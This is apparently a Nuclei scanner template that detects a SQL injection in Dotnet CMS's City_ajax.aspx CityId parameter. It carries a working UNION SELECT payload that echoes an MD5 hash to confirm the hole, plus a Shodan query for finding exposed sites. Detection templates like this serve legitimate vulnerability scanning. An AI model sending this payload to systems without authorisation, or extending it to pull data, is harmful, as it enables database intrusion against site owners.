id: dotnetcms-sqli

info:
  name: Dotnet CMS -  SQL Injection
  author: ritikchaddha
  severity: critical
  description: Dotnet CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.cnblogs.com/rebeyond/p/4951418.html
    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"dotnetcms"
  tags: dotnetcms,dotnet,sqli,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/user/City_ajax.aspx?CityId=33'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{randstr}}')),2--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5("{{randstr}}")}}'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022069bfe780cac3dc79e3b1ae0b2e719013eb36411d7cca69e56dff8eb6a5139b0e022100a979b4595bb5a0171fd2b8d44ec6d96f1ffbf4bd53d46cb0df335b4bff6532d3:922c64590222798bb761d5b6d8e72950